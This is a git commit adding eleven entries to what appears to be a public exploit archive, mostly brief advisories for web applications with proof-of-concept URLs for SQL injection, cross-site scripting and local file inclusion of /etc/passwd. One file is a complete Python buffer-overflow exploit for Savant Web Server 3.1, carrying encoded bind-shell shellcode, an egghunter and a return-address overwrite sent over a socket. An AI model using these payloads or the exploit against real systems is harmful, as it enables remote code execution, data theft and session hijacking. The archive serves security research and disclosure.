DB: 2015-04-02

11 new exploits
2015-04-02 08:35:59 +00:00 · 2015-04-02 08:35:59 +00:00 · c7e7174540
commit c7e7174540
parent a8db14d8d4
12 changed files with 245 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32996,3 +32996,14 @@ id,file,description,date,author,platform,type,port
 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80
 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross Site Scripting Vulnerability",2012-01-18,"High-Tech Bridge SA",php,webapps,0
 36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module 'id' Parameter SQL Injection Vulnerability",2012-01-19,"Robert Cooper",php,webapps,0
+36584,platforms/php/webapps/36584.txt,"Vastal EzineShop 'view_mags.php' SQL Injection Vulnerability",2012-01-19,Lazmania61,php,webapps,0
+36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 'TOPIC_ID' Parameter SQL Injection Vulnerability",2012-01-20,snup,asp,webapps,0
+36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
+36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow Vulnerability",2012-01-21,red-dragon,windows,remote,0
+36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
+36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component 'controller' Parameter Local File Include Vulnerability",2012-01-23,the_cyber_nuxbie,php,webapps,0
+36590,platforms/php/webapps/36590.txt,"Tribiq CMS 'index.php' SQL Injection Vulnerability",2012-01-21,"Skote Vahshat",php,webapps,0
+36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component 'id' Parameter SQL Injection Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Vulnerability",2012-01-23,CoBRa_21,php,webapps,0
+36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0
--- a/platforms/asp/webapps/36585.txt
+++ b/platforms/asp/webapps/36585.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51596/info
+
+Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/forum.asp?TOPIC_ID=[SQL] 
--- a/platforms/asp/webapps/36588.txt
+++ b/platforms/asp/webapps/36588.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/51608/info
+
+Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
+
+http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>
+
+http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script> 
--- a/platforms/php/webapps/36584.txt
+++ b/platforms/php/webapps/36584.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51571/info
+
+Vastal EzineShops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/mag/view_mags.php?cat_id=4â??a 
--- a/platforms/php/webapps/36586.txt
+++ b/platforms/php/webapps/36586.txt
@ -0,0 +1,104 @@
+source: http://www.securityfocus.com/bid/51597/info
+
+Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
+
+Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected. 
+
+Proof of Concept:
+=================
+The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action.
+For demonstration or reproduce ...
+
+1.1.1
+
+[+] Reports - Executive Summery - Output Listing Category
+
+<tr id="list_1" class="tableRowEven">
+<td class="status" valign="top" align="center">
+<a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif"
+title="disable" alt="disable" class="disable"></a>
+<a style="display: none;" href="#" title="Enable the reporting list" class="enableList">
+<img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a>
+				</td>
+<td valign="top"> "><EXECUTION OF PERSISTENT SCRIPT CODE!>&#039; <<="" td="">
+<td valign="top" nowrap="nowrap">
+<a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit"
+ /></a>
+<a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList"><
+;img src="img/delete.gif" title="Delete" alt="Delete" /></a>
+</td>
+</tr>
+</tbody>
+	</table>
+	</div>
+
+
+Reference(s):
+https://www.example.com.com/syneto.php?menuid=307
+
+
+
+1.1.2
+[+] EMail - Filter Add & Configure
+
+<div>Sender = >"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div>						    							<div>Receiver = .*</div>
+<div>Subject = .*(SPAM|VIAGRA).*</div>
+						
+Reference(s):
+https://www.example.com.com/syneto.php?menuid=63
+
+
+
+1.1.3
+[+] EMail Settings - New Domain
+
+">
+<table class="data" id="smtpDomainsList">
+	<thead>
+		<tr>
+			<th class="status">Status</th>
+			<th class="domain">Domain</th>
+			<th class="routing">Routing</th>
+			<th class="verify_sender">Verify sender</th>
+			<th class="qdm">Send digest</th>
+			<th class="actions">Actions</th>
+		</tr>
+	</thead>
+	<tbody>
+
+<tr id="domain_3" class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status">
+<input name="active" value="1" type="hidden">
+<input name="qdm_enabled" value="" type="hidden">
+<input name="qdm_hours" value="23" type="hidden">
+<input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden">
+<input name="verify_peer" value="" type="hidden">
+<input name="prefix_digest_links" value="" type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" />
+
+<input name="verify_sender" value="" type="hidden">
+<input name="verify_sender_network_name" value="" type="hidden"><input name="qdm_exceptions" value="" type="hidden">
+<input name="whitelist" value="" type="hidden">
+<input name="blacklist" value="" type="hidden"><img class="clickable tooltip" title="" src="img/enabled.gif">
+</td>
+<td class="domain">"><script>alert(vulnerabilitylab)</script></td>
+
+
+Reference(s):
+https://www.example.com.com/syneto.php?menuid=60
+
+
+
+1.2
+
+PoC:
+https://www.example.com.com/index.php?error=need_login"&#039;><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
+https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E
+
+
+Reference(s):
+https://www.example.com.com/index.php?error=need_login"&#039;>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
+https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
+
+
+
--- a/platforms/php/webapps/36589.txt
+++ b/platforms/php/webapps/36589.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51613/info
+
+The 'com_br' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00 
--- a/platforms/php/webapps/36590.txt
+++ b/platforms/php/webapps/36590.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51614/info
+
+Tribiq CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?id=[SQLi] 
--- a/platforms/php/webapps/36591.txt
+++ b/platforms/php/webapps/36591.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51616/info
+
+The Full ('com_full') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_full&dzial=dam_prace&id=[SQLi] 
--- a/platforms/php/webapps/36592.txt
+++ b/platforms/php/webapps/36592.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51617/info
+
+The 'com_sanpham' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi]
+http://www.example.com/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi]
+http://www.example.com/index.php?option=com_sanpham&view=product&modelsid=[SQLi]
+http://www.example.com/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi] 
--- a/platforms/php/webapps/36593.txt
+++ b/platforms/php/webapps/36593.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51618/info
+
+The 'com_xball' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+ http://www.example.com/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL) 
--- a/platforms/php/webapps/36594.txt
+++ b/platforms/php/webapps/36594.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51619/info
+
+The 'com_boss' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_boss&controller=../../../../../../../../../../../../../etc/passwd%00 
--- a/platforms/windows/remote/36587.py
+++ b/platforms/windows/remote/36587.py
@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/51607/info
+
+Savant web server is prone to a buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Savant web server 3.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+import socket
+ 
+target_address="10.10.10.129"
+target_port=80
+ 
+buffer2 = "R0cX" + "R0cX"
+# msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
+buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
+"\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
+"\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
+"\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
+"\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
+"\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
+"\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
+"\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
+"\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
+"\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
+"\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
+"\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
+"\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
+"\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
+"\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
+"\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
+"\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
+"\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
+"\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
+"\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
+"\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
+"\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
+"\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
+"\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
+"\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
+"\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
+"\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
+"\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
+"\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
+"\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")
+ 
+badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
+badbuffer += "\x90" * (254 - len(badbuffer))
+badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
+httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
+ 
+sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
+ 
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=sock.connect((target_address,target_port))
+sock.send(sendbuf)
+sock.close()